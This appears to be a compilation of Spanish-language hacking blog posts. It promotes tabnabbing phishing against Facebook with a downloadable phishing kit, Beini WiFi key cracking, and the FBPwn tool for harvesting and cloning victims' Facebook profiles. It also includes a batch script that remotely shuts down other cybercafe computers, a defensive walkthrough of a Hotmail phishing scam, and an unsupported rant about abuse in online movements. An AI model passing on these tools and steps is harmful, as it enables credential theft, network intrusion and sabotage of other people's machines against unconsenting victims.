Hackeando Facebbok Via Tabnabbing

Previamente es nesesario definir el Tabnabbing , wikipedia dice lo suiguiente :

Tabnabbing:
Este método de phishing de reciente creación consiste en aprovecharse de la costumbre de los usuarios de tener múltiples pestañas abiertas en su navegador para, una vez analizados los hábitos de navegación del usuario, sustituir una web legítima abierta en una pestaña por otra falsa que la suplante.

La técnica usada realiza esta suplantación tras un periodo de tiempo definido por el atacante, confiando en que la mayoría de los usuarios no prestan atención a la dirección web que aparece en el navegador si no a la apariencia de la página web. Así pues, se pueden realizar suplantaciones de webs de forma totalmente transparente al usuario con la finalidad de robar credenciales de acceso a diferentes servicios como puedan ser la banca online, servicios de correo web o juegos online, por ejemplo.

http://en.wikipedia.org/wiki/Tabnabbing


Como ven al hablar de tabnabbing, estamos hablando de algo reciente, mas precisamente 2010.
Muy efectivo para hackear facebook, hasta el momento.
Como todos sabemos, los ataques de phishing normales son fácilmente detectables
en Facebook porque Facebook ha implementado un código adicional que valida la
URL anterior y algunas funciones básicas.Si facebook encuentra que la página de la cual
 llegó, es un Phish  de Facebook o página falsa , muestra una advertencia o
mensaje al usuario que le ha llegado de la página fraudulenta o falsa ,por favor, cambie su contraseña de Facebook  inmediatamente.

Como la tecnología está cambiando, para sobrevivir como
hackers también tienen que cambiar sus técnicas de hacking con el tiempo je je ;D
¿Qué es y qué Tabnabbing ventaja que ofrece frente a las técnicas anteriores?

Tabnabbing es lo mismo que el phishing, la única
diferencia entre ellos es el phishing  redirige a una página en particular, mientras
Tabnabbing utiliza la función de meta refresh  de los navegadores web para actualizar la página después de un retraso particular. la función de meta refresh se utiliza en una parte de las cabeceras de las páginas web (en etiquetas)para el envío de tráfico de una fuente al sitio web después de un retraso de algunos segundos.

Muchos acostumbran tener varias pestañas del navegador abiertas, TabNabbing aprovecha para cambiar el sitio de una pestaña por la apariencia de facebook mientras revisas los contenidos de las otras pestañas. guarda tu información, te redirecciona a la página original de facebook.

pueden bajar Tabnabbing de facebook de este link que encontre por la red, van a ver 4 archivos que son los del video

http://www.mediafire.com/?uj3alcu2nnakoxf


la metodologia es la misma que la de un scam, ya saben consiguen un host o appserv.

pueden leer esto por mas info
http://alt1040.com/2010/05/tabnabbing-phishing

CREDITOS: TzSpy

El Origen de la Absurdeza

EL origen de la absurdeza.

¿Qué implica seguir adelante?
Seguir adelante implica olvidarte de cosas que han ocurrido, cosas que a pesar de que son difíciles de olvidar puedes dejarlas a un lado para continuar tu vida, tus proyectos o tus ideales. Sin embargo, seguir adelante es difícil si en el pasado se quedan recuerdos gratificantes que son necesarios desechar, y es aun más difícil si hay gente que no comprende tus decisiones o no se dan cuenta de tu realidad.

Una realidad que deja de ser el mundo en que vivimos para convertirse en el mundo irreal de la locura, pues tal pareciera que la realidad es mas absurda de lo que el mundo de las fantasías suele ser. Es por ello que nos cuesta tanto luchar por lo que queremos o deseamos e intentamos depender de alguien. Y es que siempre lo he dicho, siempre lo he pensado... este mundo no necesita gente dependiente, este mundo necesita ideas que sean funcionales para el país, el mundo. Existen mejores propuestas entre los ciudadanos que dentro de una cámara de diputados y claro con esto no me refiero a la simpleza de la respuesta a una complicada pregunta como podría ser: ¿ Qué necesita el mundo para mejorar? una respuesta mal formulada seria: "Que los políticos dejen de ser corruptos" es evidente que es una respuesta utópica que nunca se cumplirá, este mundo nunca terminara de ser como es, podremos mejorar y despertar a las masas pero nunca lograras cubrir al 100% y no debe asombrarnos pues si nosotros no comenzamos a cambiar nuestros hijos el día de mañana tendrán una mala actitud y un mal enfoque de filosofías.



¿A quien creerles? Y la respuesta mas lógica fue: "No me creas a mi ni a nadie, cree solo en ti". Suena fantasiosa la frase, pero es la realidad. No puedes ir por la vida creyendo en que todos tienen la razón, porque no es así. Mucha gente con la que te toparas posiblemente diga la verdad, la mentira o la realidad pero aun así no debes confiar al 100%, debes tener la suficiente preparación para tener un criterio amplio para saber criticar objetivamente y lograr determinar lo que es y lo que no es. Siempre intenta calificar lo que lees por ti mismo. Si alguien se dice fiel seguidor de una filosofía o un ideal entonces has todo lo posible por leer de que se trata, antes de creerle a alguien investiga e indaga a que se refiere, luego checa si cumple lo que dice y como lo dice entonces podrás darte una idea de quien es o que hace.

Nunca creas en aquel que te exija que le creas pues es claro que necesita de ti para ser alguien y eso esta mal ya que el punto positivo de la gente se gana y no se pide. Desde un principio spypeople mostró el compromiso con la gente, expresando que la fidelidad y la lealtad no se basa en el número de seguidores sino en la forma en que te acercas a ella y eso es lo suficiente para poder entender los problemas que aquejan al ciudadano. Es necesario entender también que aquellos buscadores de un país mejor no podrán solucionar todos los problemas, simplemente podrán despertar al ciudadano e incitar que otros mas se unan al movimiento. Sin embargo hay que ser claros, un movimiento implica: Responsabilidad, ética, filosofía y disciplina.

De lo contrario ese movimiento sera una tapa que dejara abierta la posibilidad para que cualquier ambicioso y corrupto entre y se haga de poder. No debes de darle mucho poder al poder por que entonces nos veremos aquejados por un monopolista o un dictador, el cual te tachara de traidor y te pondrá a medio mundo en contra, diseñara informes absurdos que se lean bonito para tapar al sol con un dedo, hará creer a los medios que ellos son los mártires y los pondrá a mirarte mal, te censuraran y te mataran. Pareciera que hablamos del sistema represor contra el que muchos pelean pero no señores estamos hablando del sistema absurdo represor que lucha contra el gobierno, aquel sistema sin ética y sin enfoque que solo busca fama y quieren tu atención. Hace muchos meses me contacto un investigador de niños abusados sexualmente, era dirigente de una organización que se dedica a investigar casos antieticos así como la pedo filia. Me advirtió de cierto movimiento, el cual no tenia ética ni enfoque. Me dijo que había pruebas de el abuso que tenían aquellos que no estaban de acuerdo con algunas cosas eran cazados y sometidos.

Este personaje tan misterioso decía ser odiado por integrantes de ese movimiento pues tenia pruebas de asuntos dudosos en varios países. Al principio del principio todo era enfocado a ayudar a la gente pero el ideal se estanco, la gente hackea sitios que nada tienen que ver e incluso solo se queda en eso, en hacking. Los antecesores del movimiento en U.S.A hacian paper storms dedicados a marchas pacificas y a otros tipos de movimientos, no en absurdeses que han cegado a la gente. 4CHAN fue el nido de todo eso y en 4chan estaba comprobado que había pornografia infantil, y no lo digo yo lo dicen varias asociaciones. Es por ello que esta noche me he dedicado a revelar poco de lo mucho que puedo saber. Y es por aquellas personas que han querido saber que sucedio con todo lo que comenzó como algo prometedor y que ahora ese ideal ha sido comprado por dinero sucio. Por ultimo debo agregar que es preferible tener un caso seguro exitoso que pretender tener el problema resuelto que originan los casos cuando solo se ha perdido el tiempo y no se muestran resultados.

SALUDOS :

MROBERT'S - MARIOROBERT - O COMO QUIERAN LLAMARME :)

Beini 1.2.1 Hack wifi Lo mas facil del mundo

Pueden el programa de esta ubicacion que les dejo al final, ahi encontraran aparte del programa, tutoriales en y demas ayuda, este programa es un sistema basado en pero no se preocupen que no tinene nada que ver con los comandos como el wifislax que es muy dificil y no todas las wifi te las reconoce como la mia, pero con Beini no tendran que memorizar comandos ni instalar drives de su targeta wifi, ya que el beini lo hace solo y todo el hackeo lo haces con el raton.

Este programa lo bajas en un comprimido, lo descomprimes y tendras una ISO, lo quemas en cd con el Nero o el Alcohol 120% y lo mejor de todo es que solo pesa (45,102 KB).




Para aquellos que no sepan como quemar una ISO a un CD, les hice este video:


Para aquellos que no sepan como hacer Booteable una imagen ISO desde , para ellos este video:


Para iniciar desde el CD y otro metodo de decifrar claves WEB, es lo mas facil del mundo 2:


Para los que tienen problemas al iniciar Beini y solo les salen 3 iconos, aqui la solucion del Compa D-HBK:



P.D : NO ME HAGO RESPONSABLE POR EL DAÑO CAUSADO O MOLESTIAS ALGUNAS. POST CON FINES EDUCATIVOS

NO estaba MUERTO.!! - Andaba de Parrandaa.!! XD


Despues de una pequeña ausentidad y de pasar momentos desagradables en el ultimo fin de semana. Decidi de una vez por todas poner fin a uno de los correos spam y descubrir el villano detras de "ELLOS"

Pondré de ejemplo HOTMAIL, ya que es el correo electrónico más común (y corriente), aunque esto funciona para cualquier tipo de correo electrónico.

Bueno todo comienza un 25 de Marzo, donde harto de que me lleguen correos basuras me decidí de una vez indagar a donde llegaban y mas allá de "ya saber el objetivo", queria saber QUIEN ERA EL VERDADERO TIPO QUE ME ANDABA Q
UERIENDO SACAR EL HOTMAIL (Y no el facebook...algo extraño)





Agrandaron la imagen?, bueno, es difícil que me manden postales, más difícil que me las envíen sin ser una fecha especial, MÁS difícil que me la envíe un hombre (véase en la imagen que me la envía un tal Carlos) , y MÁS DIFÍCIL AÚN que me la envíe alguien que no conozco (y es que, conozco a solo dos en mi entorno social, sospecho de uno ,veremos si acierto o no.... :S).


Este Ocioso curioso, decidió abrir el mail, el cual pueden ver a continuación.


Hasta aquí todo normal, yo tenía que hacer click en donde dice:

http://www.tupostal.com/view.php?eCard...



Y así lo hice, esto me tenía que llevar, SUPUESTAMENTE, a la linda postal

que me habían enviado. Pero lo que me apareció fue lo siguiente...




Una para acceder a mi cuenta de Hotmail "Antiguo" ?? (la cual ya no lo uso), lo extraño es que la página tiene como dirección "www.lozurb.com...", página que resulta dedicarse a intentar quitar contraseñas de manera GRATUITA (entre otros).

En realidad lo importante es...


¿¿¿por qué una página que dice mostrarme
una tarjeta me va a pedir una contraseña???

-Si les ha pasado, o les pasa... limítense a cerrar ese correo(solo quieren conseguir su contraseña).

-noten que hice click en: "http://www.tupostal.com..." para ver la tarjeta y en lugar de eso llegue a

"www.lozurb.com..."

-Si tienen dudas... prueben colocando una palabra cualquiera en lugar de tu verdadera clave.

Yo decidí hacer esto último (sentí curiosidad), coloqué una clave que no era mi verdadera clave, y llegué a esta página.



Si no se lee bien, la parte del dibujo de la tarjeta dice:
"Quiero regalarte la estrella más hermosa del cielo y decirte que te quiero" (sinceramente me sonrojé, este Carlos es todo un GALÁN).

Este es el estilo más común de hack, el uso de Xploits (así se a usar páginas que reenvian la contraseña que escribas, haciéndote creer que es la página oficial de hotmail (en este caso), por esto muchas páginas web recomiendan NUNCA REVELAR CONTRASEÑAS.

Decidí en meterme en asuntos un poco más de , y volví a la página que se parece mucho a la de hotmail, y me metí a leer el código de la página, y encontré esto...




A esta dirección de correo se envía lo que yo escriba en la parte de "Contraseña".

Quise averiguar quién era este Cleber Leo, y buscando llegué a esto:





Poniendo muy aparte las criminales faltas Ortográficas, podemos ver que este tipo gana 20 dolares por vender una contraseña... y promete que por 30 dólares adicionales nos puede enviar un programa que nos permite ver conversaciones pasadas entre dos contactos (ese programa no existe).

Todo funciona así, el Cliente quiere la contraseña de la Victima, y para esto recurre al supuesto Hacker, el cual normalmente te manda una postal o algún mail que de una u otra forma va a terminar pidiendo que la victima coloque su contraseña. Sea lo que sea que la Victima coloque en el "Contraseña", será enviado a un correo elegido por el hacker, y a la victima le aparecerá la postal que el esperaba ver (así no sospechará de haber caído en una trampa).

Luego que el Hacker tiene la contraseña, verificará si es correcta, si es así, enviará un mail, al Cliente desde el correo de la Victima (prueba suficiente para demostrar que tiene la contraseña), el cual es parecido al que verán a continuación.



Cuando el Cliente recibe el correo, se convence de que el Hacker tiene la clave de la Victima, y hace el depósito de los 20Dolares (en el caso del ejemplo), y posiblemente de los 30 Dolares por el programa para ver las conversaciones... De esta manera, tipos como este ganan dinero enviando la contraseña... o quizás no la enviarán... de todas formas ya tienen el dinero en su cuenta bancaria.

Evitar ser hackeado (de esta manera...la mas común ya que hay muchas otras formas) es simple, basta con no escribir la contraseña, excepto cuando entres a tu correo, una vez adentro, no tienes que volver a escribir tu contraseña hasta que cierres sesión.

Pd: si alguna vez han escuchado a un amigo decir: "¡Hay una página que te dice quién te ha bloqueado en el Messenger!" estas páginas te piden tu contraseña para hacerlo, así que mucho cuidado.


Crypt4you - Aula Virtual



Crypt4you es un nuevo formato de formación en seguridad de la información online y gratuita, que nace en la Red Temática de Criptografía y Seguridad de la Información Criptored, en la Universidad Politécnica de Madrid, España. Es criptografía para ti, criptografía y seguridad para todos. Cada nuevo tema que se ofrezca en estos cursos estará compuesto por un conjunto de lecciones que se publicarán en el sitio Web del proyecto cada quince días, siendo sus autores investigadores y profesores miembros de esta red temática. El objetivo de Crypt4you es convertirse en el Aula Virtual de referencia de seguridad de la información en lengua española. Para solucionar cualquier duda, por favor consulta nuestro FAQ (Frequently Asked Questions) o contacta con nosotros en nuestro correo electrónico.

Bromeando y Observando en un Cyber

Siguiendo con un poco de diversion. Hoy me fui a un cyber que estaba a unas cuadras de mi casa...y mas ni menos me puse a curosear un poquito lo aprendido en batch ..!! :D

@echo off
color a
title apagando
shutdown -m equipo -s -t 10 -c "esto es una broma jejejep.!! xD"
exit
exit

Copian el codigo en un block de notas y lo guardan como archivo.bat

shutdown -m\\equipo -s -t 10 -c "esto es una broma jejejep.!! xD"

shutdown == comando utilizado para apagar, reiniciar y finalizar sesiones

-m equipo == comando utilizado para especificar el nombre de una maquina o ip en la red del ciber cafe

-s == comando urilizado para apagar un equipo

-t 10 == comando utilizado para el tiempo en que demora en apagarse la maquina elegida, el numero 10 pueden poner cualquiera como 0.

-c"" == comando utilizado para mostrar en una ventana el texto escrito dentro de las ("texto aqui")

para mas informacion ir a:

inicio
ejecutar
cmd
enter

escribir el siguiente comando en el simbolo del sistema

shutdown /?


Saludos Gente.!! ;)




Anduve un corto tiempo off-line dentro de mi cuenta de facebook. Claro, con un objetivo en mente; y es que encontrar hoy en dia vulnerabilidades se me ha hecho un hobby. Pero claro, siempre haciendo el bien :D





Hoy les traigo un pequeño programa programado por Ahmed Saafan experto en JAVA. Al que se dedica hace mucho tiempo. Sin mas que decir les dejo las caracteristicas de este ejecutable.

FBPwn es un framework de ingeniería social multi-plataforma escrito en Java por Ahmed Saafan para el robo de cuentas de facebook, esta aplicaciones es realmente interesante, envía solicitudes de amistad a una lista de perfiles de facebook y una vez que la víctima acepta la invitación vuelca toda su información, fotos y lista de amigos en una carpeta local para hacer uso de ella ademas tiene la siguiente lista de funciones.

-Volcado de la lista de amigos
-Agregar todos los amigos de las víctimas
-Vuelca todas las imágenes del álbum de los usuarios
-Vuelca la información del perfil
-Volcado de fotos (este fotos de los perfiles medios)
-Compruebe solicitud de amigos
-Volcado de el muro de la víctima
-Clonar los perfiles

TUTORIAL : http://www.youtube.com/watch?v=QAErFmN64t8&feature=player_embedded


Descarga:
https://code.google.com/p/fbpwn/downloads/list